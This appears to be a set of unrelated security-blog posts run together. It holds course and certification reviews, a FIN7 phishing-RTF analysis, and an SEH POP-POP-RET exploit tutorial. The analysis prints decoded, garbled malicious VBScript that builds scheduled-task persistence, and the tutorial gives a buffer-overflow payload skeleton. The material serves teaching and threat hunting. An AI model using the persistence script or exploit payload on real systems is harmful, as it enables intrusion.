Post‑compromise activity confirmed a user‑profile loader executing a staged PowerShell that was invoked multiple times. ScriptBlock 4104 logs, when enabled, provide decisive visibility to reconstruct payloads and produce durable IOCs. In Part 3, we’ll follow command‑and‑control behaviors and data access that followed this execution stage.

My Experience with the CRT-ID Certification

I recently completed the Certified Red Team Infrastructure Developer (CRT-ID) certification from Cyberwarfare Labs, and I’m excited to share my comprehensive review of this unique course. If you’re looking to enhance your red teaming skills with a focus on infrastructure development, this might be exactly what you need.

What is the CRT-ID Course About?

The Certified Red Team Infrastructure Developer (CRT-ID) is a specialized course designed to equip cybersecurity professionals with the skills to develop OPSEC-safe Red Team infrastructure for both internal and external operations. Unlike many other red team courses that focus primarily on exploitation techniques, this course dives deep into the infrastructure backbone that makes successful red team operations possible.

The course teaches you to:

• Utilize legitimate cloud and on-premise services for red team operations
• Build custom redirectors and payload server features
• Implement infrastructure that mirrors real-world threat scenarios
• Apply knowledge through an in-depth Red Team attack case study

Course Structure and Modules

The course is meticulously organized into 6 comprehensive modules, each building upon the previous one:

1. Introduction

• Red Team Models: Understanding both external and internal red team approaches
• Modern Red Team Infrastructure: Overview of contemporary infrastructure components
• Red Team Infrastructure Components:
  • Command & Control (C2) Server
  • Redirectors
  • Payload Server
  • Phishing Server

2. Command & Control Server

• C2 Pools & Selection: Criteria for choosing the right C2 framework
• Mythic Installation: Hands-on setup of the open-source Mythic C2 framework
• Operator Roles: Multi-operator access and role-based permissions
• C2 Profiles: Configuration files for stealth communication
• OPSEC Safe Setup: Security considerations including SSL certificates, network firewall, traffic redirection, and geo-fencing

3. Redirector Setup

Cloud-Based Setup (SSL):

• AWS CloudFront: Leveraging Amazon’s CDN for traffic redirection
• Azure Front Door CDN: Using Microsoft’s CDN services for operations

On-Premise Setup (SSL):

• Nginx: Manual and automated configuration
• Custom Rules Creation:
  • Directory-based rules
  • User-Agent based filtering
  • IP-based restrictions

4. Payload Server

• Open-source Setup: Using PwnDrop for payload hosting
• Custom Setup: Nginx with facade files for stealth payload delivery
• Legitimate Application Integration: IPFS and Adobe Portfolio techniques

5. Phishing Server

• Evilginx: Advanced phishing framework for credential harvesting
• GoPhish: Campaign management and centralized phishing operations
• Multi-Factor Authentication Bypass: Session token capture and reuse techniques

6. Red Team Case Study

A complete full-fledged initial access operation covering:

• Infrastructure overview and setup
• Implant development using DotNetToJScript
• Payload hosting and delivery mechanisms
• Email campaign execution through GoPhish integration

Why I Chose This Course

The CRT-ID stands out as one of the most unique courses in the red team training landscape for several reasons:

Technical Excellence

• Comprehensive Coverage: Emphasis on both cloud (AWS/Azure) and on-premise infrastructure setup
• OPSEC-Safe Methodologies: Focus on operational security throughout all modules
• Open-Source Focus: Deep dive into Mythic C2, which is compatible with Mac, Windows, and Linux
• Commercial-Grade Features: Mythic offers capabilities comparable to expensive commercial C2 frameworks

Resource: They have added an automated way to deploy a robust red team infra on their Github you can check it Here

Practical Application

• Hands-On Labs: Build your infrastructure from scratch using cloud services
• Real-World Scenarios: Infrastructure mirrors actual threat actor methodologies
• Expert Instruction: The instructor demonstrates deep subject matter expertise
• Complete Operational Knowledge: Gain skills to set up fully operational red team infrastructure

Value Proposition

• Affordable Pricing: Currently offered at a significant discount ($5 instead of $49)
• Excellent ROI: Substantial knowledge gain for minimal investment
• Both Environments: Comprehensive coverage of cloud and on-premise setups

Pro Tip: If you’re planning the cloud setup track, ensure you have an AWS or Azure account ready. Follow the step-by-step instructions precisely as provided by the instructor.

Exam Experience

Cyberwarfare Labs recently launched a new exam format that significantly improves the testing experience.

New Exam Format Features

• Flag-Based Assessment: No written report submission required
• 6-Hour Hands-On Exam: Practical testing of learned concepts
• 2 Attempts per Enrollment: Multiple chances for success
• Convenient Scheduling: Easy booking through their Labs Portal
• Instant Results: No waiting period for scoring

My Personal Exam Journey

I initially scheduled my exam for August 17th, but encountered a technical issue where VPN credentials weren’t generated in the portal. The support team was responsive and resolved the issue by August 19th, allowing me to reschedule for August 21st.

The exam went flawlessly:

• Stable lab environment throughout the entire session
• CTF-style challenges that directly tested course knowledge
• Completed in 1 hour 45 minutes (out of 6 hours allocated)
• All 10 flags captured successfully
• Instant pass notification - no waiting for results!

Credential Link: Here

Exam Tips

• CLI proficiency is essential
• Basic bash scripting knowledge is highly beneficial
• The exam maintains a fun, engaging CTF-style format
• All challenges directly relate to course material

Cyberwarfare Labs Red Team Certification Path

Completing the CRT-ID allowed me to finish Cyberwarfare Labs’ beginner to intermediate roadmap, which consists of four complementary certifications:

1. Red Team Infrastructure Developer [CRT-ID]

Foundational knowledge in infrastructure development - the perfect starting point for your red teaming journey.

Credential Link: Here

2. Red Team Analyst [CRTA]

Completed: September 5th, 2023

Focuses on analytical skills and understanding attacker methodologies from a defensive perspective.

Credential Link: Here

3. Red Team – CredOps Infiltrator [CRT-COI]

Completed: September 17th, 2023

Deep dive into credential operations, system infiltration, and security control manipulation.

Credential Link: Here

4. Red Team Specialist [CRTS]

Both CRTSv1 and CRTSv2 completed

Advanced penetration testing covering:

• Web application security
• Network penetration testing
• Active Directory exploitation
• Docker environment attacks
• CI/CD pipeline abuse
• Unique storylines: Nuclear Simulation (v1) and Electrical PowerGrid (v2)

Credential Link: Here

Learning from Experience: I wish I had taken these certifications in the order specified on their blog post, as each builds upon the previous one’s knowledge foundation.

Final Thoughts and Recommendations

What You’ll Gain

• In-Depth Knowledge: Comprehensive understanding of red team infrastructure
• Real-World Skills: Practical experience with industry-standard tools and techniques
• Career Advancement: Positioning for red team operator/engineer roles

Why This Certification Matters

• High Demand: Red team professionals are increasingly sought after in the cybersecurity market
• Resume Enhancement: Certification validates your practical skills
• Career Opportunities: Opens doors to specialized red team positions
• Practical Application: Skills directly translate to real-world scenarios

Who Should Take This Course

• Beginner/Intermediate cybersecurity professionals
• Those looking to start in red teaming
• Professionals wanting to enhance existing red team skills
• Anyone interested in the infrastructure side of offensive security

Investment Value

Cyberwarfare Labs consistently offers regular discounts, making their courses accessible without compromising quality. The knowledge gained provides excellent value for career development in the cybersecurity field.

Conclusion

The CRT-ID certification delivers exceptional value for anyone serious about red team infrastructure development. The combination of theoretical knowledge, hands-on labs, and practical case studies creates a comprehensive learning experience that directly translates to real-world capabilities.

Whether you’re just starting your red team journey or looking to specialize in infrastructure development, this certification provides the foundational knowledge needed to build and operate OPSEC-safe red team infrastructure.

Recommendation: Highly recommended for cybersecurity professionals at beginner to intermediate levels. The affordable pricing, expert instruction, and comprehensive coverage make this an investment you won’t regret.

Introduction

Welcome to the first post in my Threat Hunting series. We are starting with FIN7’s initial access tradecraft: a phishing-delivered, weaponized RTF that abuses living-off-the-land binaries and scheduled tasks to get a foothold. This post distills the key artifacts and shows practical hunts you can run.

This is Part 1 of my Threat Hunting series. Each post focuses on one phase of an intrusion with practical hunts and response tips.

What is FIN7?

FIN7 is a Russia-based threat group targeting the US and EU, focusing on sectors rich in payment card data such as restaurants, hospitality, retail, finance, gaming, and travel.

Initial access is typically via targeted spearphishing with Office exploits or embedded executables; they have also mailed BADUSB devices that emulate keyboards to auto-type malware on Windows hosts.

Post-exploitation commonly involves Carbanak for C2 and data theft, and Cobalt Strike for enumeration, lateral movement, and privilege escalation.

Multiple law enforcement actions since 2018 led to arrests and sentencing tied to thefts exceeding $1 billion.

Employs broad MITRE ATT&CK-aligned TTPs: spearphishing and supply chain compromise for initial access, living-off-the-land execution and persistence, privilege escalation via misconfigurations, defense evasion by masquerading as legitimate processes, Kerberoasting for credentials, lateral movement via RDP and SSH, C2 over varied ports, and exfiltration to MEGA.

Notable campaigns include POS scraping against major US restaurant chains and large-scale heists against 100+ financial institutions worldwide using Carbanak and coordinated ATM cash-outs.

FIN7 uses a phishing-delivered RTF to establish MS SQL–based C2, persist, move laterally, and exfiltrate card data.

Artifact Collection

Scenario

You are given a suspicious RTF document. Your goal is to analyze its contents using rtfdump and custom Python to assess maliciousness and extract indicators of compromise (IOCs) for further investigation.

Step 1: Compute file hash

Generate the SHA-256 hash of the RTF to support integrity verification and enterprise-wide scoping.

kali@kali:~/Desktop$ sha256sum 2-list.rtf 
ce08cc99d0827bd9d900cf2e2e26aed3e17ae4f80b010eb6642b9578b3627cf4  2-list.rtf
kali@kali:~/Desktop$ 

Step 2: Collect file metadata

Extract creation and modification metadata, authorship, and other attributes using ExifTool to enrich context and timeline analysis.

kali@kali:~/Desktop$ exiftool 2-list.rtf 
ExifTool Version Number         : 11.88
File Name                       : 2-list.rtf
Directory                       : .
File Size                       : 1843 kB
File Modification Date/Time     : 2022:08:18 23:14:36+00:00
File Access Date/Time           : 2025:08:10 11:57:09+00:00
File Inode Change Date/Time     : 2025:08:10 11:35:54+00:00
File Permissions                : rw-r--r--
File Type                       : RTF
File Type Extension             : rtf
MIME Type                       : text/rtf
Author                          : Jen
Last Modified By                : Windows User
Create Date                     : 2020:06:22 11:08:00
Modify Date                     : 2021:06:11 16:19:00
Revision Number                 : 14
Total Edit Time                 : 36 minutes
Pages                           : 1
Words                           : 83
Characters                      : 474
Characters With Spaces          : 556
Internal Version Number         : 85

Step 3: Extract embedded objects with rtfdump

Enumerate RTF-embedded objects and export the suspicious payload Windows shortcut (LNK) file for inspection.

kali@kali:~/Desktop$ rtfdump -O -s 1 -d 2-list.rtf > lnk_extract.lnk
kali@kali:~/Desktop$ strings lnk_extract.lnk 
/C:\
Windows
System32
mshta.exe
C:\Windows\System32\mshta.exe
desktop-k2q081j
1SPS
1SPS

Step 4: Deobfuscate the code blocks using our custom Python code.

FIN7 hides JS/VBS filenames and commands in obfuscated chr() sequences that use math to disguise the ASCII codes, to deobfuscate that we created a fully automated decoder that:

• Reads the RTF directly
• Extracts all chr() expressions (including math)
• Outputs the decoded string in one go

import re
import sys

if len(sys.argv) != 2:
    print(f"Usage: {sys.argv[0]} <rtf_file>")
    sys.exit(1)

rtf_file = sys.argv[1]

# Read file
with open(rtf_file, "r", errors="ignore") as f:
    data = f.read()

# Find all chr(...) patterns including math expressions
matches = re.findall(r"chr\s*\(\s*([0-9+\-*/\s]+)\s*\)", data, flags=re.IGNORECASE)

decoded = ""

for expr in matches:
    try:
        # Evaluate math expression safely (integers only)
        value = int(eval(expr))
        decoded += chr(value)
    except Exception as e:
        pass  # Skip any malformed chr() entries

print(decoded)

Running our custom Python code give us the following output.

kali@kali:~/Desktop$ python3 decode_rtf_chr.py 2-list.rtf 
Dim cntent1, contnt2
Dim oFSO, oFSO3strAppata, wshShel
Set wshShel = CreateObject("Wscript.hell")
Set  = GetObject,"Word.Appliation")
contnt1 = w.ActiveDocument.Shapes(4).TextFrame.TextRang.Text
content = w.ActiveDocument.Shaps(5).TextFrae.TextRange.Text
Set oFSO  CreateObject("ScriptingFileSystemObect")
Set oFO2 = CreateOject("Scripting.FileSysteObject")
strocalAppData  wshShell.ExandEnvironmetStrings( "%LOCALAPPDATA% ) + "\"
outile = strLocalAppData + "sql-rat.js"
Set objFile = oFSO.CreateTxtFile(outFie,True)
objFle.WriteLinecontent1
objFile.WriteLin content2
obFile.Close
oSO2.CopyFile"C:\Windows\System32\wscrit.exe", strLocalAppData + "adb156.exe
Dim serviceSet service  CreateObjec("Schedule.Srvice")
Call service.Connct()
Dim rootFolder, taskefinition, regInfo
Set rootFolder = service.GetFoldr("\")
Set taskDefinition = service.NeTask(0)
Set egInfo = taskDefinition.ReistrationInfo
regInfo.Description = "icriosoft Upate Service"regInfo.Authr = "system"Dim settings triggers, tigger
Set settings = taskefinition.settings
setting.Enabled = Tue
settings.StartWhenAvaiable = True
settings.Hiden = False
Set triggers =taskDefinitin.triggers
St trigger = triggers.Crete(2)
Dim curTime
Dim strtTime, endTme
Dim datevalue, timevalue, dtsvalue
tsnow = Datedd("n", 5, Now)
dd = Righ("00" & Day(tsnow), 2)
m = Right("00 & Month(dtsnow), 2)
yy = Year(dtsnow)hh = Right("0" & Hour(dtnow), 2)
nn  Right("00" & Minute(dtsnw), 2)
ss = ight("00" & econd(dtsnow, 2)
datevale = yy & "-"& mm & "-" & dd
timevalu = hh & ":"  nn & ":" & s
dtsvalue =datevalue & "T" & timevale
endTime = 2024-04-18T0:10:00"
triger.StartBoundry = dtsvalu
trigger.EndBoundary = enTime
trigger.DaysInterva = 1
trigger.ID = "DailyTrggerId"
triger.Enabled =True
Dim Acton
Set Actio = taskDefintion.Actions.Create(0)
Set wshShell =CreateObject "WScript.Shll" )
ActionPath = strLoalAppData + adb156.exe"
ction.Argumets = "/b /e:script " + strLocalAppData + "sql-rat.s"
Call rootolder.RegistrTaskDefiniton("Micriosot Update Serice", taskDefinition, 6,  , 3)
Dim cntent1, contnt2
Dim oFSO, oFSO3strAppata, wshShel
Set wshShel = CreateObject("Wscript.hell")
Set  = GetObject,"Word.Appliation")
contnt1 = w.ActiveDocument.Shapes(4).TextFrame.TextRang.Text
content = w.ActiveDocument.Shaps(5).TextFrae.TextRange.Text
Set oFSO  CreateObject("ScriptingFileSystemObect")
Set oFO2 = CreateOject("Scripting.FileSysteObject")
strocalAppData  wshShell.ExandEnvironmetStrings( "%LOCALAPPDATA% ) + "\"
outile = strLocalAppData + "sql-rat.js"
Set objFile = oFSO.CreateTxtFile(outFie,True)
objFle.WriteLinecontent1
objFile.WriteLin content2
obFile.Close
oSO2.CopyFile"C:\Windows\System32\wscrit.exe", strLocalAppData + "adb156.exe
Dim serviceSet service  CreateObjec("Schedule.Srvice")
Call service.Connct()
Dim rootFolder, taskefinition, regInfo
Set rootFolder = service.GetFoldr("\")
Set taskDefinition = service.NeTask(0)
Set egInfo = taskDefinition.ReistrationInfo
regInfo.Description = "icriosoft Upate Service"regInfo.Authr = "system"Dim settings triggers, tigger
Set settings = taskefinition.settings
setting.Enabled = Tue
settings.StartWhenAvaiable = True
settings.Hiden = False
Set triggers =taskDefinitin.triggers
St trigger = triggers.Crete(2)
Dim curTime
Dim strtTime, endTme
Dim datevalue, timevalue, dtsvalue
tsnow = Datedd("n", 5, Now)
dd = Righ("00" & Day(tsnow), 2)
m = Right("00 & Month(dtsnow), 2)
yy = Year(dtsnow)hh = Right("0" & Hour(dtnow), 2)
nn  Right("00" & Minute(dtsnw), 2)
ss = ight("00" & econd(dtsnow, 2)
datevale = yy & "-"& mm & "-" & dd
timevalu = hh & ":"  nn & ":" & s
dtsvalue =datevalue & "T" & timevale
endTime = 2024-04-18T0:10:00"
triger.StartBoundry = dtsvalu
trigger.EndBoundary = enTime
trigger.DaysInterva = 1
trigger.ID = "DailyTrggerId"
triger.Enabled =True
Dim Acton
Set Actio = taskDefintion.Actions.Create(0)
Set wshShell =CreateObject "WScript.Shll" )
ActionPath = strLoalAppData + adb156.exe"
ction.Argumets = "/b /e:script " + strLocalAppData + "sql-rat.s"
Call rootolder.RegistrTaskDefiniton("Micriosot Update Serice", taskDefinition, 6,  , 3)

What happened

A malicious RTF embedded:

• A Windows shortcut (LNK) that leads to script execution
• Obfuscated VBScript encoded as chr() arithmetic

When decoded and executed, the script:

• Writes a staged JavaScript payload to %LOCALAPPDATA% as sql-rat.js
• Copies wscript.exe to %LOCALAPPDATA% as adb156.exe to blend in
• Creates a Scheduled Task named “Micrisoft Update Service” to persist and run the payload

Why this works

• RTFs can carry embedded objects that many users will open
• LOLBINs like mshta.exe and wscript.exe are trusted, often bypassing naive allowlists
• Scheduled Tasks provide quiet, durable persistence in user context

IOCs

• Sample hash: ce08cc99d0827bd9d900cf2e2e26aed3e17ae4f80b010eb6642b9578b3627cf4
• Files and paths:
  • %LOCALAPPDATA%\sql-rat.js
  • %LOCALAPPDATA%\adb156.exe
  • C:\Windows\System32\mshta.exe
• Scheduled Task: Micrisoft Update Service
• Process patterns:
  • mshta.exe spawning script engines
  • wscript.exe executed from user-writable paths

What to hunt for (Splunk snippets)

• mshta spawning interpreters:

index=win* (process_name="mshta.exe" OR parent_process_name="mshta.exe")
| stats values(child_process_name) as children by host user parent_process_path process_command_line
| where mvfind(children, "wscript.exe|cscript.exe|powershell.exe|cmd.exe")>=0

• Script engines from user profile locations:

index=win* process_name IN ("wscript.exe","cscript.exe","mshta.exe","powershell.exe")
| where like(process_path, "%\\Users\\%") OR like(process_path, "%\\AppData\\Local%") OR like(process_path, "%\\AppData\\Roaming%")

• Suspicious Scheduled Tasks (creation or presence):

index=win* EventCode=4698 OR (source=Sysmon EventCode=1 process_command_line="*Schedule.Service*")
| search TaskName="*Update*" OR TaskName="*Micrisoft*"

• Writes to LocalAppData with suspicious names:

index=win* source=Sysmon EventCode=11 TargetFilename="*\\AppData\\Local\\*"
| regex TargetFilename=".*(adb[0-9]{3}\.exe|sql\-rat\.js)$"

Quick response checklist

• Quarantine the host and remove the Scheduled Task
• Delete sql-rat.js and adb156.exe from LocalAppData
• Investigate parent process chain starting from the document opener and mshta.exe
• Review other endpoints for the same hash, task name, and file paths
• Rotate user credentials if any script had credential access

Conclusion

FIN7’s initial access hinges on familiar building blocks: a booby-trapped document, LOLBIN execution, and scheduled persistence. Small typos and user-writable paths are your tells. In the next post, I will cover how the payload establishes command and control and how to hunt for it effectively.

A Clear Overview of the CBBH Certification

In this post, I’ll share my experience with the HTB Certified Bug Bounty Hunter (CBBH) certification. Whether you’re new to web penetration testing or already familiar with CBBH, there’s something here for everyone.

What is Web Application Penetration Testing and Bug Bounty Hunting?

Web Application Penetration Testing is the practice of assessing the security of web applications by simulating real-world attacks. The goal is to identify vulnerabilities such as SQL injection, XSS, authentication bypass, and more, before malicious actors can exploit them.

Bug Bounty Hunting, on the other hand, is a legal and coordinated process where independent security researchers find and report security vulnerabilities to organizations in exchange for rewards. It’s an excellent way to improve security skills while earning recognition or monetary compensation.

What is the CBBH Certification?

The Certified Bug Bounty Hunter (CBBH) is an intermediate-level certification from Hack The Box that focuses on practical, hands-on skills for web application security testing and bug bounty hunting.

As with all HTB certifications, completion of the associated learning path is mandatory before attempting the exam. For CBBH, this means completing the Bug Bounty Hunter path in HTB Academy which includes 20 modules with skills assessment to practice the concepts learn in the course.

My Review and Experience

Initial Plan

My initial plan was to complete HTB CDSA and then take on the exam. However, after finishing the SOC Analyst path, I realized I needed more hands-on practice and to revisit all the modules before attempting the exam. This was mainly due to new concepts introduced in modules like:

• Introduction to Malware Analysis & DFIR
• Threat Hunting (a field I recently discovered and started to really enjoy)

I didn’t want to rush. Instead, I decided to take my time, dive deeper into these topics, and do additional research. I will start a blog series on threat hunting, where I’ll be exploring malware analysis and threat hunting in depth (more on that in my next post).

Switching Focus to CBBH

While pursuing those interests, I decided to complete the Bug Bounty Hunter path to strengthen my web application penetration testing skills.
At the time, I had already completed about 68% of the path thanks to my HTB CPTS certification, since the Penetration Tester path shares several overlapping modules with CBBH.
This left me with only 6 modules to complete before being eligible for the exam.

My Preparation Strategy

After finishing the path, I created custom cheat sheets for each module not just the ones provided by HTB Academy.

These included:

• Every command used in the module examples
• Extra notes from solving skill assessments
• Additional commands and techniques from my own research

This was incredibly helpful and played a huge role in passing the exam on my first attempt.
I highly recommend:

1. Creating your own cheat sheets
2. Organizing your notes in Markdown
3. Keeping each module’s vulnerabilities and techniques handy during the exam

Exam Experience

I reviewed all modules again, finalized my notes, and scheduled my exam to start on July 28th.

The experience was smooth:

• No technical issues
• Very stable lab environment

Tips for the exam:

• Refer to your notes and modules whenever stuck (I did this multiple times, and it saved me)
• Take breaks and clear your mind when frustrated
• Write your report as you go capture screenshots and command outputs immediately

I scored 100 points by capturing all 10 flags (only 85 points were needed to pass). The last flag was challenging but very satisfying to exploit.

It took me 5 days out of the 7 allotted to get 100 points and submit my report.

Reporting

My report was:

• Neatly formatted
• Thoroughly documented
• Written so that the reader could reproduce everything without confusion

This comes from lessons learned in past exams, where I significantly improved my reporting skills.

I submitted my report on August 1st and received my results on August 12th a much shorter wait compared to when I took the CPTS last year.

Final Thoughts

I highly recommend CBBH to anyone looking to:

• Upskill in web application penetration testing
• Begin bug bounty hunting

The methodology taught in the Bug Bounty Hunter path is more than enough to get started in real-world scenarios, and I plan to apply it in my free time.

What’s Next?

My next steps:

• Take Hands-On Web Exploitations by NahamSec on HackingHub
• Practice more with PortSwigger and PentesterLab
• Eventually take on the bigger challenge of the HTB CWEE exam, which is already on my radar

In August 2019, I enrolled in the RITx MicroMasters in Cybersecurity, a program delivered by the Rochester Institute of Technology (RIT) in partnership with edX. At the time, the program didn’t have open enrollment, so I had to wait until January 2020 to get started.

My goal was clear: gain the foundational skills and credibility needed to transition into a cybersecurity career. Although COVID hitted the same year and disrupted job prospects, the knowledge and skills I gained helped me secure an IT position later on. In hindsight, this program was a meaningful step in my professional growth.

🎓Program Overview

• Institution: Rochester Institute of Technology (RIT)
• Platform: edX
• Cost (in 2025): ~$1,596
• Courses: 5 total
• Pacing: Instructor-led (weekly deadlines)
• Duration: Each course ran for 8 weeks
• Effort: ~10–12 hours/week
• Passing Grade: 80% or higher required per course

Courses Included:

1. Cybersecurity Fundamentals (CYBER501x)
2. Computer Forensics (CYBER502x)
3. Cybersecurity Risk Management (CYBER503x)
4. Network Security (CYBER504x)
5. Cybersecurity Capstone (CYBER525x)

📚 Course-by-Course Breakdown

1. Cybersecurity Fundamentals (CYBER501x)

This foundational course introduces key cybersecurity concepts such as threats, vulnerabilities, the CIA triad, cryptography, access control models, and cyber defense strategies.

Key topics:

• CIA triad (Confidentiality, Integrity, Availability)
• Common cyber threats and attack vectors
• Cryptographic fundamentals and PKI
• Authentication and access control

Hands-on Component: ✅ Yes — the course includes practical labs to reinforce theoretical concepts.

My Thoughts: A solid entry point for newcomers. The labs made abstract ideas concrete and helped me grasp core concepts quickly.

Credential Link: Here

2. Computer Forensics (CYBER502x)

Learn how to collect, preserve, and analyze digital evidence in legal and investigative contexts. Includes exposure to tools like Autopsy and FTK Imager.

Key topics:

• File system analysis
• Timeline construction
• Email and memory forensics
• Legal/ethical considerations in investigations

Hands-on Component: ✅ Yes — labs and tool-based exercises in real forensic environments.

My Thoughts: Very engaging. This course made me appreciate the depth of detail needed in incident response and legal investigations.

Credential Link: Here

3. Cybersecurity Risk Management (CYBER503x)

Focused on assessing and managing cybersecurity risks in enterprise environments. You explore frameworks like NIST RMF, governance, compliance, and policy development.

Key topics:

• Risk identification and mitigation
• Threat modeling
• Security governance and frameworks (NIST, ISO)
• Business continuity and impact analysis

Hands-on Component: ❌ No formal labs, more case study-driven.

My Thoughts: Though more theory-heavy, this course provided critical insight into the business side of cybersecurity—very useful for aspiring managers or consultants.

Credential Link: Here

4. Network Security (CYBER504x)

A technically rich course focused on protecting network infrastructure using techniques like firewalls, VPNs, IDS/IPS, and secure design.

Key topics:

• TCP/IP and secure protocols (TLS, SSH, DNSSEC)
• Firewalls, IDS/IPS systems
• Packet sniffing and network monitoring
• VPNs and network segmentation

Hands-on Component: ✅ Yes — labs to apply concepts in packet analysis and secure design.

My Thoughts: This course required a good grasp of networking, but it was very rewarding. I learned how attackers exploit networks and how to defend them.

Credential Link: Here

5. Cybersecurity Capstone (CYBER525x)

The final course in the program. A cumulative project where learners apply skills from the previous four courses.

Capstone format:

• Realistic simulations of security incidents
• Network breach investigation
• Digital forensics reporting

Hands-on Component: ✅ 100% practical — all assessments were lab-based and graded by instructors.

My Thoughts: A challenging but fulfilling end to the program. The capstone mirrored real-world tasks and required critical thinking across domains.

Credential Link: Here

💬 Support & Community

• Weekly discussion forums: Each course had active forums for learners to discuss assignments and share ideas.
• Support team: The edX support team and RIT staff were responsive when I had technical or conceptual questions.
• Peer learning: While there were no live classes, the forums helped create a sense of community.

📈 What I Gained

• A solid academic foundation in cybersecurity
• Practical experience with real tools in forensics and networking
• Insight into risk management and governance
• Confidence to speak about cybersecurity in professional settings While I didn’t land a security role immediately due to the pandemic, I eventually transitioned into an IT role where I could apply many of the skills I learned.

✅ Pros & ❌ Cons

Pros

• Reputable certification from a well-known university (RIT)
• Structured pacing and weekly goals
• Strong practical components in 4 of the 5 courses
• Capstone was a real-world test of skill
• Helpful support and active community

Cons

• Limited interactivity with instructors (asynchronous only)
• Risk Management course lacked hands-on elements
• Now slightly dated compared to platforms offering newer tools and techniques
• Not ideal if you’re aiming for technical certifications (like OSCP or CompTIA)

🔄 RITx in 2020 vs Cybersecurity Learning in 2025

When I took this course, platforms like HackTheBox Academy or TryHackMe were either new or not yet as mature. Now, there are more interactive, hands-on platforms that provide deep technical training for roles like Security Analyst or Penetration Tester—often at a much lower cost.

Still, for those looking to:

• Gain academic credibility
• Apply for graduate school
• Understand cybersecurity beyond tools and tactics

The RITx MicroMasters continues to offer great value.

🙋 Would I Recommend It in 2025?

Yes, but it depends on your goals.

• ✔ Great for: Mid-career professionals, career switchers, those pursuing a master’s
• ❌ Not ideal for: Entry-level candidates looking for job-ready skills quickly

For a more modern, hands-on path, platforms like:

• HackTheBox Academy
• TryHackMe
• TCM Security
• INE

Those are excellent choices for technical deep-dives and practical lab environments.

📌 Final Tips

• Treat each course like a real university class stay disciplined
• Use external resources (e.g., YouTube, HackTheBox) to reinforce tough topics
• Engage in the forums; it improves learning and retention
• Don’t expect instant results build experience step-by-step

💭 Final Thoughts

The RITx MicroMasters in Cybersecurity gave me the structure and foundation I needed to move into the tech space. Even if I didn’t land a security job right away, it opened the door and gave me the confidence to keep going.

Credential Link: Here

Have questions or want to know more? Reach out, I’m happy to share more about my journey.

Part of the Exploit Development Module – Certified Cybersecurity Engineer (CCSE) – By Cyberwarfare Labs

📚 Table of Contents

1. Introduction
2. What is a Stack Overflow?
3. Understanding Structured Exception Handling (SEH)
4. Where Does POP-POP-RET Come In?
5. Breaking Down POP-POP-RET
6. Step-by-Step Example of Using POP-POP-RET in an SEH Exploit
7. Finding a Suitable POP-POP-RET Instruction
8. Example Exploit Code
9. What Happens When We Run the Exploit?
10. Conclusion
11. Next Steps

🔰 Introduction

This blog post is part of the Exploit Development module in my journey through the Certified Cybersecurity Engineer (CCSE) certification by Cyberwarfare Labs.

In this article, we explore a common and effective technique in Windows exploitation—POP-POP-RET, which is often used in SEH-based exploits. We’ll cover not only what it is and how it works but also walk through a practical example and payload structure.

🧠 What is a Stack Overflow?

A stack overflow is a flaw that occurs when a program writes more data to a stack-based buffer than it can hold. This causes adjacent memory to be overwritten, which can include other local variables and more importantly, the return address.

If the conditions are right, an attacker can overwrite the EIP (Instruction Pointer) and redirect execution to malicious code. If not, the program will likely crash—leading to a Denial of Service (DoS).

In Structured Exception Handler (SEH) based overflows, we target the SEH chain on the stack, aiming to hijack control flow when an exception occurs.

📌 Understanding Structured Exception Handling (SEH)

Structured Exception Handling (SEH) is a mechanism in Windows that allows applications to gracefully handle exceptions such as illegal memory access, division by zero, etc.

• Every thread maintains an SEH chain (linked list of exception handlers).
• This chain is stored on the stack, making it exploitable.
• When an exception occurs, Windows walks this chain to locate a suitable handler.

📌 Where Does POP-POP-RET Come In?

In SEH exploits, our goal is to overwrite the SEH handler with an address that helps us redirect execution to our shellcode.

That’s where POP-POP-RET comes in. It helps us bypass basic protections and cleanly transfer execution from the overwritten SEH record to our shellcode, without triggering further exceptions.

📌 Breaking Down POP-POP-RET

This sequence of instructions helps clean up the stack before jumping to your shellcode:

• POP – Removes and discards the top of the stack.
• POP – Removes another stack value.
• RET – Pops the next address off the stack and jumps to it (our shellcode).

✅ Example Flow:

1. SEH handler is overwritten with the address of a POP-POP-RET sequence.
2. When an exception triggers, Windows jumps to this address.
3. POP and POP discard stack garbage.
4. RET sends execution to your crafted payload.

📌 Step-by-Step Example of Using POP-POP-RET in an SEH Exploit

Scenario: Vulnerable Windows Application

1. Buffer Overflow Identified

   • Input function allows more bytes than the buffer can safely handle.

2. Analyze Stack Layout

   • Locate Next SEH and SEH Handler on the stack.

3. Payload Construction

   • Overwrite Next SEH with a short jump (\xEB\x06) to shellcode.
   • Overwrite SEH Handler with address of a POP-POP-RET instruction.

4. Trigger Exception

   • Application crashes.
   • Windows traverses the SEH chain.
   • Our POP-POP-RET sequence is executed.
   • RET takes execution to our shellcode.

📌 Finding a Suitable POP-POP-RET Instruction

We are using Mona.py in Immunity Debugger to find usable instructions that are not protected by SafeSEH or ASLR.

!mona seh

Example output:

0x1001AABB : pop pop ret | [vulnlib.dll] 

Using this address in our payload to overwrite the SEH handler.

📌 Example Exploit Code

payload  = b"A" * 2000                      # Fill buffer to reach SEH
payload += b"\xEB\x06\x90\x90"             # Next SEH: Short Jump over SEH
payload += b"\xBB\xAA\x01\x10"             # SEH Handler: POP-POP-RET address
payload += b"\x90" * 20                    # NOP sled
payload += b"\xcc" * 300                   # Shellcode: INT 3 for debugging

Breakdown:

• "A" * 2000 → Fills the buffer and reaches SEH
• \xEB\x06 → Jumps 6 bytes forward (to shellcode).
• \x90\x90 → NOPs for alignment.
• \xBB\xAA\x01\x10 → Little-endian address of POP-POP-RET. Overwrites SEH
• "\x90" * 20 → Safe space for Shellcode
• "\xcc" * 300 → Breakpoint to analyze control transfer in debugger (Shellcode).

📌 What Happens When We Run the Exploit?

1. Application crashes → triggers exception.
2. Windows reads SEH chain → finds overwritten handler.
3. Executes POP-POP-RET → stack cleaned.
4. RET jumps to Next SEH (short jump).
5. Execution lands in shellcode → code execution achieved.

📌 Conclusion

• POP-POP-RET is a classic yet powerful method in SEH exploitation.
• Helps bypass protections by cleaning the stack and redirecting flow.
• Requires a deep understanding of the stack and exception handling.

While modern protections like SafeSEH, DEP, and ASLR make this harder today, it’s a critical foundational technique for understanding Windows exploit development.

I’m planning to enroll in their Exploit Development course which goes indeep about exploit development Certified Exploit Development Professional (CEDP) and will definitely write a review about it.

Here’s another good article that showcase this vulnerability in Easy Chat Server 3.1 here

